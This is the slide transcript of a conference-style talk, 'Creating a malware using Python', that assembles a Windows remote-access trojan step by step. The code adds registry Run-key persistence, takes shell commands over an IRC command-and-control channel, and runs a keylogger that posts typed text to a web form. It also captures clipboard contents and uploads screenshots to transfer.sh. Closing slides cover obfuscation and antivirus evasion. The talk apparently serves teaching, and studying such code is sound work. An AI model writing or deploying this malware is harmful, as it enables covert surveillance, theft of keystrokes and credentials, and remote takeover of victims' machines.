Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Creating a malware using Python

yyyyyyyan
October 19, 2018

Creating a malware using Python

yyyyyyyan

October 19, 2018
Tweet

More Decks by yyyyyyyan

Other Decks in Programming

Transcript

  1. 1. from os.path import realpath 2. from winreg import *

    3. 4. file_path = realpath(__file__) 5. run = r'Software\Microsoft\Windows\CurrentVersion\Run' 6. try: 7. key = OpenKey(HKEY_LOCAL_MACHINE, run, 0, KEY_SET_VALUE) 8. except PermissionError: 9. # Not running as administrator :( 10. else: 11. SetValueEx(key, 'MALWARE', 0, REG_SZ, file_path) 12. key.Close() 23
  2. 1. from os.path import realpath 2. from winreg import *

    3. 4. file_path = realpath(__file__) 5. run = r'Software\Microsoft\Windows\CurrentVersion\Run' 6. try: 7. key = OpenKey(HKEY_LOCAL_MACHINE, run, 0, KEY_SET_VALUE) 8. except PermissionError: 9. # Not running as administrator :( 10. else: 11. SetValueEx(key, 'MALWARE', 0, REG_SZ, file_path) 12. key.Close() 24
  3. 1. from os.path import realpath 2. from winreg import *

    3. 4. file_path = realpath(__file__) 5. run = r'Software\Microsoft\Windows\CurrentVersion\Run' 6. try: 7. key = OpenKey(HKEY_LOCAL_MACHINE, run, 0, KEY_SET_VALUE) 8. except PermissionError: 9. # Not running as administrator :( 10. else: 11. SetValueEx(key, 'MALWARE', 0, REG_SZ, file_path) 12. key.Close() 25
  4. 1. from os.path import realpath 2. from winreg import *

    3. 4. file_path = realpath(__file__) 5. run = r'Software\Microsoft\Windows\CurrentVersion\Run' 6. try: 7. key = OpenKey(HKEY_LOCAL_MACHINE, run, 0, KEY_SET_VALUE) 8. except PermissionError: 9. # Not running as administrator :( 10. else: 11. SetValueEx(key, 'MALWARE', 0, REG_SZ, file_path) 12. key.Close() 26
  5. 1. from os.path import realpath 2. from winreg import *

    3. 4. file_path = realpath(__file__) 5. run = r'Software\Microsoft\Windows\CurrentVersion\Run' 6. try: 7. key = OpenKey(HKEY_LOCAL_MACHINE, run, 0, KEY_SET_VALUE) 8. except PermissionError: 9. # Not running as administrator :( 10. else: 11. SetValueEx(key, 'MALWARE', 0, REG_SZ, file_path) 12. key.Close() 27
  6. 1. from os.path import realpath 2. from winreg import *

    3. 4. file_path = realpath(__file__) 5. run = r'Software\Microsoft\Windows\CurrentVersion\Run' 6. try: 7. key = OpenKey(HKEY_LOCAL_MACHINE, run, 0, KEY_SET_VALUE) 8. except PermissionError: 9. # Not running as administrator :( 10. else: 11. SetValueEx(key, 'MALWARE', 0, REG_SZ, file_path) 12. key.Close() 28
  7. 1. import socket 2. class AttackerConnection: 3. def __init__(self, irc_address):

    4. self.socket = socket.socket() 5. self.socket.connect(irc_address) 6. 7. connection = AttackerConnection(('irc.pycon.net', 6667)) 36
  8. 1. import socket 2. class AttackerConnection: 3. def __init__(self, irc_address):

    4. self.socket = socket.socket() 5. self.socket.connect(irc_address) 6. 7. connection = AttackerConnection(('irc.pycon.net', 6667)) 37 That's it?
  9. 1. import socket 2. import re 3. class AttackerConnection: 4.

    def __init__(self, irc_address, nick): 5. self.socket = socket.socket() 6. self.socket.connect(irc_address) 7. self.register_user(nick) 8. self.nick = nick 9. 10. def send_command(self, cmd): 11. cmd += '\r\n' 12. self.socket.send(cmd.encode('utf8')) 13. 14. def receive_command(self): 15. msg = self.socket.recv(4096) 16. msg=msg.decode('utf8', errors='ignore') 17. self.answer_ping(msg) 18. return msg 19. def register_user(self, nick): 20. self.send_command('NICK ' + nick) 21. self.send_command('USER {0} {0} {0} :{0}'.format(nick)) 22. 23. def answer_ping(self, msg): 24. match = re.match(PING :(.*)', msg) 25. if match: 26. pong = match.group(1) 27. self.send_command('PONG :' + pong) 38
  10. 1. import socket 2. import re 3. class AttackerConnection: 4.

    def __init__(self, irc_address, nick): 5. self.socket = socket.socket() 6. self.socket.connect(irc_address) 7. self.register_user(nick) 8. self.nick = nick 9. 10. def send_command(self, cmd): 11. cmd += '\r\n' 12. self.socket.send(cmd.encode('utf8')) 13. 14. def receive_command(self): 15. msg = self.socket.recv(4096) 16. msg=msg.decode('utf8', errors='ignore') 17. self.answer_ping(msg) 18. return msg 19. def register_user(self, nick): 20. self.send_command('NICK ' + nick) 21. self.send_command('USER {0} {0} {0} :{0}'.format(nick)) 22. 23. def answer_ping(self, msg): 24. match = re.match(PING :(.*)', msg) 25. if match: 26. pong = match.group(1) 27. self.send_command('PONG :' + pong) 39
  11. 1. import socket 2. import re 3. class AttackerConnection: 4.

    def __init__(self, irc_address, nick): 5. self.socket = socket.socket() 6. self.socket.connect(irc_address) 7. self.register_user(nick) 8. self.nick = nick 9. 10. def send_command(self, cmd): 11. cmd += '\r\n' 12. self.socket.send(cmd.encode('utf8')) 13. 14. def receive_command(self): 15. msg = self.socket.recv(4096) 16. msg=msg.decode('utf8', errors='ignore') 17. self.answer_ping(msg) 18. return msg 19. def register_user(self, nick): 20. self.send_command('NICK ' + nick) 21. self.send_command('USER {0} {0} {0} :{0}'.format(nick)) 22. 23. def answer_ping(self, msg): 24. match = re.match(PING :(.*)', msg) 25. if match: 26. pong = match.group(1) 27. self.send_command('PONG :' + pong) 40
  12. 1. import socket 2. import re 3. class AttackerConnection: 4.

    def __init__(self, irc_address, nick): 5. self.socket = socket.socket() 6. self.socket.connect(irc_address) 7. self.register_user(nick) 8. self.nick = nick 9. 10. def send_command(self, cmd): 11. cmd += '\r\n' 12. self.socket.send(cmd.encode('utf8')) 13. 14. def receive_command(self): 15. msg = self.socket.recv(4096) 16. msg=msg.decode('utf8', errors='ignore') 17. self.answer_ping(msg) 18. return msg 19. def register_user(self, nick): 20. self.send_command('NICK ' + nick) 21. self.send_command('USER {0} {0} {0} :{0}'.format(nick)) 22. 23. def answer_ping(self, msg): 24. match = re.match(PING :(.*)', msg) 25. if match: 26. pong = match.group(1) 27. self.send_command('PONG :' + pong) 41
  13. 1. import socket 2. import re 3. class AttackerConnection: 4.

    def __init__(self, irc_address, nick): 5. self.socket = socket.socket() 6. self.socket.connect(irc_address) 7. self.register_user(nick) 8. self.nick = nick 9. 10. def send_command(self, cmd): 11. cmd += '\r\n' 12. self.socket.send(cmd.encode('utf8')) 13. 14. def receive_command(self): 15. msg = self.socket.recv(4096) 16. msg=msg.decode('utf8', errors='ignore') 17. self.answer_ping(msg) 18. return msg 19. def register_user(self, nick): 20. self.send_command('NICK ' + nick) 21. self.send_command('USER {0} {0} {0} :{0}'.format(nick)) 22. 23. def answer_ping(self, msg): 24. match = re.match(PING :(.*)', msg) 25. if match: 26. pong = match.group(1) 27. self.send_command('PONG :' + pong) 42
  14. 1. import socket 2. import re 3. class AttackerConnection: 4.

    def __init__(self, irc_address, nick): 5. self.socket = socket.socket() 6. self.socket.connect(irc_address) 7. self.register_user(nick) 8. self.nick = nick 9. 10. def send_command(self, cmd): 11. cmd += '\r\n' 12. self.socket.send(cmd.encode('utf8')) 13. 14. def receive_command(self): 15. msg = self.socket.recv(4096) 16. msg=msg.decode('utf8', errors='ignore') 17. self.answer_ping(msg) 18. return msg 19. def register_user(self, nick): 20. self.send_command('NICK ' + nick) 21. self.send_command('USER {0} {0} {0} :{0}'.format(nick)) 22. 23. def answer_ping(self, msg): 24. match = re.match(PING :(.*)', msg) 25. if match: 26. pong = match.group(1) 27. self.send_command('PONG :' + pong) 43
  15. 1. connection = AttackerConnection(('irc.pycon.net', 6667), 'MalwareBot') 2. while True: 3.

    cmd = connection.receive_command() 4. # Handle command Main Loop 44
  16. 50

  17. 51

  18. 52 1. from subprocess import run, PIPE, STDOUT 2. 3.

    def run_command_on_shell(cmd): 4. process_complete = run(cmd, shell=True, stdout=PIPE, stderr=STDOUT) 5. response = process_complete.stdout.decode('utf8', errors='ignore') 6. return response
  19. 53 but what about the communication with the attacker? 1.

    from subprocess import run, PIPE, STDOUT 2. 3. def run_command_on_shell(cmd): 4. process_complete = run(cmd, shell=True, stdout=PIPE, stderr=STDOUT) 5. response = process_complete.stdout.decode('utf8', errors='ignore') 6. return response
  20. 54 1. class AttackerConnection: 2. # Code omitted 3. def

    parse_msg(self, msg): 4. match = re.match(':(.*)!.*@.*(?:\..*)* PRIVMSG {} :(.*)'.format(self.nick), msg) 5. return match 6. 7. def receive_command(self): 8. msg = self.socket.recv(4096).decode('utf8', errors='ignore') 9. self.answer_ping(msg) 10. msg_match = self.parse_msg(msg) 11. if msg_match: 12. return msg_match.groups() 13. return None, None 14. # Code omitted
  21. 55 1. class AttackerConnection: 2. # Code omitted 3. def

    parse_msg(self, msg): 4. match = re.match(':(.*)!.*@.*(?:\..*)* PRIVMSG {} :(.*)'.format(self.nick), msg) 5. return match 6. 7. def receive_command(self): 8. msg = self.socket.recv(4096).decode('utf8', errors='ignore') 9. self.answer_ping(msg) 10. msg_match = self.parse_msg(msg) 11. if msg_match: 12. return msg_match.groups() 13. return None, None 14. # Code omitted
  22. 56 1. class AttackerConnection: 2. # Code omitted 3. def

    parse_msg(self, msg): 4. match = re.match(':(.*)!.*@.*(?:\..*)* PRIVMSG {} :(.*)'.format(self.nick), msg) 5. return match 6. 7. def receive_command(self): 8. msg = self.socket.recv(4096).decode('utf8', errors='ignore') 9. self.answer_ping(msg) 10. msg_match = self.parse_msg(msg) 11. if msg_match: 12. return msg_match.groups() 13. return None, None 14. # Code omitted
  23. 57 1. connection = AttackerConnection(('irc.pycon.net', 6667), 'MalwareBot') 2. commands =

    {'!shell':run_command_on_shell} 3. re_commands = '|'.join(commands.keys()) 4. while True: 5. nick_from, cmd = connection.receive_command() 6. cmd_match = re.match('({})(?: (.*))?'.format(re_commands), cmd) 7. if cmd_match: 8. cmd_type, args = cmd_match.groups() 9. response = commands[cmd_type](args) 10. else: 11. response = 'Command not found' 12. connection.send_command('PRIVMSG {} :{}'.format(nick_from, response))
  24. 58 1. connection = AttackerConnection(('irc.pycon.net', 6667), 'MalwareBot') 2. commands =

    {'!shell':run_command_on_shell} 3. re_commands = '|'.join(commands.keys()) 4. while True: 5. nick_from, cmd = connection.receive_command() 6. cmd_match = re.match('({})(?: (.*))?'.format(re_commands), cmd) 7. if cmd_match: 8. cmd_type, args = cmd_match.groups() 9. response = commands[cmd_type](args) 10. else: 11. response = 'Command not found' 12. connection.send_command('PRIVMSG {} :{}'.format(nick_from, response))
  25. 59 1. connection = AttackerConnection(('irc.pycon.net', 6667), 'MalwareBot') 2. commands =

    {'!shell':run_command_on_shell} 3. re_commands = '|'.join(commands.keys()) 4. while True: 5. nick_from, cmd = connection.receive_command() 6. cmd_match = re.match('({})(?: (.*))?'.format(re_commands), cmd) 7. if cmd_match: 8. cmd_type, args = cmd_match.groups() 9. response = commands[cmd_type](args) 10. else: 11. response = 'Command not found' 12. connection.send_command('PRIVMSG {} :{}'.format(nick_from, response))
  26. 60 1. connection = AttackerConnection(('irc.pycon.net', 6667), 'MalwareBot') 2. commands =

    {'!shell':run_command_on_shell} 3. re_commands = '|'.join(commands.keys()) 4. while True: 5. nick_from, cmd = connection.receive_command() 6. cmd_match = re.match('({})(?: (.*))?'.format(re_commands), cmd) 7. if cmd_match: 8. cmd_type, args = cmd_match.groups() 9. response = commands[cmd_type](args) 10. else: 11. response = 'Command not found' 12. connection.send_command('PRIVMSG {} :{}'.format(nick_from, response))
  27. 61 1. connection = AttackerConnection(('irc.pycon.net', 6667), 'MalwareBot') 2. commands =

    {'!shell':run_command_on_shell} 3. re_commands = '|'.join(commands.keys()) 4. while True: 5. nick_from, cmd = connection.receive_command() 6. cmd_match = re.match('({})(?: (.*))?'.format(re_commands), cmd) 7. if cmd_match: 8. cmd_type, args = cmd_match.groups() 9. response = commands[cmd_type](args) 10. else: 11. response = 'Command not found' 12. connection.send_command('PRIVMSG {} :{}'.format(nick_from, response))
  28. Hello, world! 69 1. import keyboard 2. 3. pressed_keys =

    [] 4. keyboard.on_press(lambda k: pressed_keys.append(k.name))
  29. Hello, world! shiftHello,spaceworldshift! 70 1. import keyboard 2. 3. pressed_keys

    = [] 4. keyboard.on_press(lambda k: pressed_keys.append(k.name))
  30. 1. import keyboard 2. 3. pressed_keys = [] 4. special_keys

    = {'space':' ', 'enter':'\n'} 5. 6. def handle_key(k): 7. if 'shift' in k.modifiers: 8. pressed_keys.pop() 9. key = k.nome 10. if len(key) > 1: 11. key = special_keys.get(key, '<< {} >>'.format(key)) 12. pressed_keys.append(key) 13. 14. keyboard.on_press(handle_key) 71
  31. 1. import keyboard 2. 3. pressed_keys = [] 4. special_keys

    = {'space':' ', 'enter':'\n'} 5. 6. def handle_key(k): 7. if 'shift' in k.modifiers: 8. pressed_keys.pop() 9. key = k.nome 10. if len(key) > 1: 11. key = special_keys.get(key, '<< {} >>'.format(key)) 12. pressed_keys.append(key) 13. 14. keyboard.on_press(handle_key) 72
  32. 1. import keyboard 2. 3. pressed_keys = [] 4. special_keys

    = {'space':' ', 'enter':'\n'} 5. 6. def handle_key(k): 7. if 'shift' in k.modifiers: 8. pressed_keys.pop() 9. key = k.nome 10. if len(key) > 1: 11. key = special_keys.get(key, '<< {} >>'.format(key)) 12. pressed_keys.append(key) 13. 14. keyboard.on_press(handle_key) 73
  33. 1. import keyboard 2. 3. pressed_keys = [] 4. special_keys

    = {'space':' ', 'enter':'\n'} 5. 6. def handle_key(k): 7. if 'shift' in k.modifiers: 8. pressed_keys.pop() 9. key = k.nome 10. if len(key) > 1: 11. key = special_keys.get(key, '<< {} >>'.format(key)) 12. pressed_keys.append(key) 13. 14. keyboard.on_press(handle_key) 74
  34. 1. import keyboard 2. 3. pressed_keys = [] 4. special_keys

    = {'space':' ', 'enter':'\n'} 5. 6. def handle_key(k): 7. if 'shift' in k.modifiers: 8. pressed_keys.pop() 9. key = k.nome 10. if len(key) > 1: 11. key = special_keys.get(key, '<< {} >>'.format(key)) 12. pressed_keys.append(key) 13. 14. keyboard.on_press(handle_key) 75 and how does the attacker access this?
  35. 1. from requests import post 2. 3. url_form = #linkToForm#

    4. def handle_key(k): 5. # Code omitted 6. if len(pressed_keys) >= 100: 7. typed_text = ''.join(pressed_keys) 8. pressed_keys.clear() 9. post(url_form, {'entry.1269107664':typed_text}) 76
  36. 1. from requests import post 2. 3. url_form = #linkToForm#

    4. def handle_key(k): 5. # Code omitted 6. if len(pressed_keys) >= 100: 7. typed_text = ''.join(pressed_keys) 8. pressed_keys.clear() 9. post(url_form, {'entry.1269107664':typed_text}) 77
  37. 1. from requests import post 2. 3. url_form = #linkToForm#

    4. def handle_key(k): 5. # Code omitted 6. if len(pressed_keys) >= 100: 7. typed_text = ''.join(pressed_keys) 8. pressed_keys.clear() 9. post(url_form, {'entry.1269107664':typed_text}) 78
  38. 79 1. from requests import post 2. 3. url_form =

    #linkToForm# 4. def handle_key(k): 5. # Code omitted 6. if len(pressed_keys) >= 100: 7. typed_text = ''.join(pressed_keys) 8. pressed_keys.clear() 9. post(url_form, {'entry.1269107664':typed_text})
  39. 1. from pyperclip import paste 2. 3. def handle_copypaste(): 4.

    copied_text = paste() 5. pressed_keys.extend(list(copied_text)) 6. 7. keyboard.add_hotkey('ctrl+c', handle_copypaste) 81 Golden touch
  40. 1. from pyscreenshot import grab_to_file 2. 3. def take_screenshot(filename): 4.

    grab_to_file(filename) 5. 6. commands = {'!shell': run_command_on_shell, '!screenshot': take_screenshot} 88
  41. 1. from pyscreenshot import grab_to_file 2. 3. def take_screenshot(filename): 4.

    grab_to_file(filename) 5. 6. commands = {'!shell': run_command_on_shell, '!screenshot': take_screenshot} 89 and how does the attacker access this?
  42. 1. from pyscreenshot import grab_to_file 2. from requests import post

    3. 4. def take_screenshot(filename): 5. grab_to_file(filename) 6. with open(filename, 'rb') as f: 7. r = post('https://transfer.sh', files={filename: f}) 8. response = r.text if r.status_code == 200 else 'Upload error' 9. return response 90
  43. 1. from pyscreenshot import grab_to_file 2. from requests import post

    3. 4. def take_screenshot(filename): 5. grab_to_file(filename) 6. with open(filename, 'rb') as f: 7. r = post('https://transfer.sh', files={filename: f}) 8. response = r.text if r.status_code == 200 else 'Upload error' 9. return response 91
  44. 1. from os import remove 2. from pyscreenshot import grab_to_file

    3. from requests import post 4. 5. def take_screenshot(filename): 6. grab_to_file(filename) 7. with open(filename, 'rb') as f: 8. r = post('https://transfer.sh', files={filename: f}) 9. response = r.text if r.status_code == 200 else 'Upload error' 10. return response 11. remove(filename) 92
  45. 98 Using pyminifier 1. pyminifier -O -o level1.py malware.py 2.

    pyminifier -O --nonlatin -o level2.py malware.py
  46. 99 Using pyminifier 1. pyminifier -O -o level1.py malware.py 2.

    pyminifier -O --nonlatin -o level2.py malware.py 3. pyminifier -O --nonlatin --replacement-length=100 -o level3.py malware.py
  47. 100 Using pyminifier 1. pyminifier -O -o level1.py malware.py 2.

    pyminifier -O --nonlatin -o level2.py malware.py 3. pyminifier -O --nonlatin --replacement-length=100 -o level3.py malware.py 4. pyminifier -O --nonlatin --replacement-length=100 --gzip -o level4.py malware.py
  48. • Don't share files and/or links with anyone • Don't

    allow anyone besides you to use your computes • Don't use Internet for shopping, adult entertainment or online games • Never uses public WiFi • Don't share your private WiFi with anyone • Never clicks in any ads • Always uses extremely safe passwords and never repeats it on different applications • Don't use a smartphone • Don't download anything through the Internet Unless you... 119
  49. • Don't share files and/or links with anyone • Don't

    allow anyone besides you to use your computes • Don't use Internet for shopping, adult entertainment or online games • Never uses public WiFi • Don't share your private WiFi with anyone • Never clicks in any ads • Always uses extremely safe passwords and never repeats it on different applications • Don't use a smartphone • Don't download anything through the Internet • Don't use an operational system Unless you... 120
  50. Protection against antivirus 123 7. • Signature => Polymorphic code

    • Sandbox => Detection (mouse) https://github.com/boppreh/mouse/
  51. Protection against antivirus 124 7. • Signature => Polymorphic code

    • Sandbox => Detection (mouse) • Heuristic method => ?